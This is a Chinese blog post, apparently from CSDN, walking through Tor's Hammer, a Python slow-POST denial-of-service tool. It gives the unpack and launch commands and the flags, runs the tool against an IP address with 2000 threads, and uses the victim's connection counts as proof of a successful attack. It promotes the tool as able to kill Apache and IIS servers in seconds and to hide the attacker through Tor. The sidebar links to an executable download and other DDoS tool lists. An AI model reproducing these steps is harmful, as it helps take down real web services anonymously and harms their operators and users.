torshammer

最新推荐文章于 2024-10-14 09:08:48 发布
最新推荐文章于 2024-10-14 09:08:48 发布
阅读量2.7k 收藏 10
点赞数 2
分类专栏: 黑客技术 文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ft4703895/article/details/48006067
版权

torshammer是另一个不错的DOS测试工具。 它是用Python编写的。 这个工具有一个额外的优势:它可以通过TOR匿名网络执行攻击。 这是一个非常有效的工具,它可以在几秒内杀了Apache和IIS服务器。

工具使用很简单,只需解压后就可使用

tar xf torshammer.tgz

解压完以后会有三个文件

socks.py  terminal.py  torshammer.py

只需运行./torshammer.py前提是有安装python

/*
 * Tor's Hammer 
 * Slow POST DoS Testing Tool
 * entropy [at] phiral.net
 * Anon-ymized via Tor
 * We are Legion.
 */

./torshammer.py -t <target> [-r <threads> -p <port> -T -h]
 -t|--target <Hostname|IP>
 -r|--threads <Number of threads> Defaults to 256
 -p|--port <Web Server Port> Defaults to 80
 -T|--tor Enable anonymising through tor on 127.0.0.1:9050
 -h|--help Shows this help

Eg. ./torshammer.py -t 192.168.1.100 -r 256

上面解释的很清楚:
-t:指定主机
-r:指定连接数量
-p:指定端口(这里只针对web server且默认端口为80)
-T:挂代理的使用方式
之后就可以使用了和例子一样:

./torshammer.py -t 192.168.10.73 -r 2000

这里我们连接数多一些,效果明显,启动以后的程序

/*
 * Tor's Hammer 
 * Slow POST DoS Testing Tool
 * entropy [at] phiral.net
 * Anon-ymized via Tor
 * We are Legion.
 */


/*
 * Target: 211.155.84.73 Port: 80
 * Threads: 2000 Tor: False
 * Give 20 seconds without tor or 40 with before checking site
 */
Posting: 0
Posting: h
Posting: c

反应在被攻击的主机上,可以用ss -s命令来查看

Total: 2325 (kernel 2334)
TCP:   2012 (estab 2002, closed 3, orphaned 0, synrecv 0, timewait 3/0), ports 10

Transport Total     IP        IPv6
*     2334      -         -        
RAW   0         0         0        
UDP   14        8         6        
TCP   2009      2008      1        
INET      2023      2016      7        
FRAG      0         0         0

可以看到estab 2002estab这个参数明显升高,正常一般都会是10一下。这里也可以证明我们的攻击成功了。

RicHook
关注
专栏目录
Tool-X 工具汇总
binghuo000的博客
03-12 1万+
Tool-X 工具汇总(更新中......) 本文用于分析Tool-X里面各软件功能用途及特点,以便在需要的时候迅速找到适用的软件! Tool-X是一个由python编写的用于安装kali linux黑客工具的安装程序。在Tool-X的帮助下,你可以在任何Root或非Root的Android设备中安装黑客工具。Tool-X中为我们提供了近262款黑客工具,这些工具可供termux app和GN...
设置apache2.4代理服务器转发HTTP请求与响应,通过slow http dos测试
马面的专栏
08-24 1万+
原系统为行业内业务系统,布署了两套系统,分别采用Jboss和webLogic作为服务器,两套系统在同一个物理机器上,使用两个端口。 服务器:weblogic12.1.2     Jboss eap6.0 数据库:oracle12(另一个物理机器,两套系统共用)
slow post ddos tools torshammer (win32可执行下载)
Yatere的天平秤
03-19 7375
torshammer win32 可执行exe下载: http://howfile.com/file/2611e8a1/9c6c9f8f/ 是针对慢速 post的攻击,针对apache兼职是绝杀 socket.py """SocksiPy - Python SOCKS module. Version 1.00 Copyright 2006 D
Torshammer:Tor的锤子-缓慢的POST拒绝服务测试工具-开源
05-29
Tor's Hammer 是一个用 Python 编写的缓慢的 DOS 后测试工具。 也可以通过Tor网络将其匿名运行。 如果你打算用 Tor 运行它,它假设你在 127.0.0.1:9050 上运行 Tor。 通过单个实例杀死大多数运行 Apache 和 IIS 的未受保护的 Web 服务器。 使用约 128 个线程杀死 Apache 1.X 和较旧的 IIS,使用约 256 个线程杀死更新的 IIS 和 Apache 2.X。
ddos、http协议、TCP协议攻击工具及使用方法(Hyenae、SlowHTTPTest、TorshammerPyloris、Zarp)
网络安全领域优质创作者
10-19 5967
Hyenae : 不做推荐介绍,因为把我自己的路由器玩崩了,本地路由器响应不了那么多的请求,本地电脑不要轻易尝试。感兴趣的自行百度。 SlowHTTPTest:很好用。 Slowhttptest是依赖HTTP协议的慢速攻击DoS攻击工具,设计的基本原理是服务器在请求完全接收后才会进行处理,如果客户端的发送速度缓慢或者发送不完整,服务端为其保留连接资源池占用,大量此类请求并发将导致DoS。 攻...
python ddos攻击_使用Torshammer执行DDoS攻击
weixin_39915171的博客
11-24 527
用的方法很少,声称DDoS或任何类型的网络丢失都是成功的。让我们看一下执行DDoS攻击的方法之一。这种攻击非常强大,并且需要您应该知道如何在Kali Linux操作系统上操作命令的唯一技能。首先,如果你想检查任何网站都有它的TCP端口80开启与否,你可以去nmap和给定的所有教程NMAP。我们使用的这个工具是Torshammer。它是用Python编写的,可以在实例中对未受保护的Web服务器造成损...
CC攻击工具list
djph26741的博客
06-28 5481
从论文里抠出来的工具列表如下,后面有黑产的工具以及网络上摘录的工具: 分类:(1)有僵尸网络(是否代理服务器)&没有的==》(2)单一url&混合url(多线程,压测为主,demo工具居多) 1. 超强CC攻击器:只要输入攻击目标服务器的IP地址,设置好相关参数即可进行攻击。可设置攻击线程、攻击频率,利用大量代理服务器形成僵尸网络(设置代理服务器ip列表)。CC...
Anonymous-OS操作系统
03-18
国外著名的黑客组织Anonymous于近日发布了一款自行开发的操作系统,该系统被命名为Anonymous-OS,并将DuckDuckGo定为其默认的搜索引擎。 Anonymous-OS操作系统基于Ubuntu 11.10,使用Mate桌面,主要是出于教育目的,以检查网页的安全性。 此外,该操作系统还提供各种Web渗透测试工具,包括ParolaPass Password Generator、Find Host IP、Anonymous HOIC、Ddosim、Pyloris、Slowloris、TorsHammer、Sqlmap、Havij、Sql Poison、Admin Finder、John the Ripper、Hash Identifier、Tor、XChat IRC、Pidgin、Vidalia、Polipo、JonDo、i2p、Wireshark、Zenmap等,系统用户密码MD5为:2ae66f90b7788ab8950e8f81b829c947,解密后为:anon。
关于Tor比较全面的讲解
热门推荐
yinchangxin的专栏
12-22 15万+
隐身术——使用Tor匿名网络与proxychains构建SOCKS代理链IP跳板,在渗透测试与攻击入侵时销声匿迹 *****免责声明***** 此处介绍的技术仅作为研究,学习,交流用,严禁任何个人,机构,公司,组织,团体使用这里公布的技术对任何类似上述的第三方实体进行未经授权,非法的渗透测试与攻击入侵,同时本博文作者不承担由此造成目标的任何(包括但不限于)经济损失,用户数据丢失
linux系统中几款简单好用测试软件
weixin_34342905的博客
11-27 338
2019独角兽企业重金招聘Python工程师标准>>> ...
Linux下DOS攻击学习教程
WannaCry_reboot
04-08 1113
1.启动实验系统: 2.选择Not listed? 手动输入root帐号密码:root/123456 3.点击sign登录 4.在桌面右键 open terminal: 5.在DDOS实验之前,先设置一下docker容器所能使用的CPU、内存资源上限,以免DDOS的时候容器将虚拟主机的资源全部占用,导致虚拟主机崩溃。 首先启动docker服务: ...
DOS攻击工具介绍
frankwhere的博客
03-24 7275
DoS(Denial Of Service)攻击是指故意的攻击网络协议实现的缺陷或直接通过野蛮手段残忍地耗尽被攻击对象的资源, 目的是让目标计算机或网络无法提供正常的服务或资源访问,使目标系统服务系统停止响应甚至崩溃 然而随着网络上免费的可用DDoS工具增多,DoS攻击也日益增长,下面介绍几款Hacker常用的DoS攻击工具。 特别提示:仅用于攻防演练及教学测试用途,禁止非法使用。 1、卢瓦(LO...
chrom中的httpwatch不显示信息_电脑中了这样的木马不要怕,照着这样排除一定能抓出来...
weixin_32559261的博客
01-07 143
盖茨木马0x00 前言Linux盖茨木马是一类有着丰富历史,隐藏手法巧妙,网络攻击行为显著的DDoS木马,主要恶意特点是具备了后门程序,DDoS攻击的能力,并且会替换常用的系统文件进行伪装。木马得名于其在变量函数的命名中,大量使用Gates这个单词。分析和清除盖茨木马的过程,可以发现有很多值得去学习和借鉴的地方。0x01 应急场景某天,网站管理员发现服务器CPU资源异常,几个异常进程占用大量网络带...
【人工智能学习之PaddleOCR快速上手】
Jiagym的博客
10-12 1265
在配置文件中,可以设置组建模型、优化器、损失函数、模型前后处理的参数,PaddleOCR从配置文件中读取到这些参数,进而组建出完整的训练流程,完成模型训练,在需要对模型进行优化的时,可以通过修改配置文件中的参数完成配置,使用简单且方便修改。而 L2 正则化中,添加正则化项的目的在于减少参数平方的总和。准确检测的标准是检测框与标注框的IOU大于某个阈值,正确识别的检测框中的文本与标注的文本相同。如果缺少带标注的数据,或者不想投入研发成本,建议直接调用开放的API,开放的API覆盖了目前比较常见的一些垂类。
Python 使用 Jarvis 算法或包装的凸包(Convex Hull using Jarvis’ Algorithm or Wrapping)
最新发布
csdn_aspnet的专栏
10-14 1158
例如,当输入 (0, 3), (0, 0), (0, 1), (3, 0), (3, 3) 时,它产生 (0, 3) (0, 0) (3, 0) (3, 3) 的输出;当输入 (0, 3), (0, 1), (0, 0), (3, 0), (3, 3) 时,输出为 (0, 3) (0, 1) (0, 0) (3, 0) (3, 3)。下一个点被选为在逆时针方向上领先于所有其他点的点,即,如果对于任何其他点 r,我们有“orientation(p, q, r) = 逆时针”,则下一个点是 q。
有趣的开源项目——Taipy(构建Python数据和AI Web应用程序)
Soul丶君的博客
10-11 908
Taipy 是专为数据科学家和机器学习工程师设计的,用于构建数据与 AI Web 应用程序的工具。⭐️ 使构建生产就绪的 Web 应用程序成为可能。⭐️ 无需学习新的语言,仅需 Python。⭐️ 专注于数据和 AI 算法,而不用担心开发和部署的复杂性。
Backend - Java 基础
是萝卜干呀的博客
10-11 842
知识量决定了未来能走多远
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值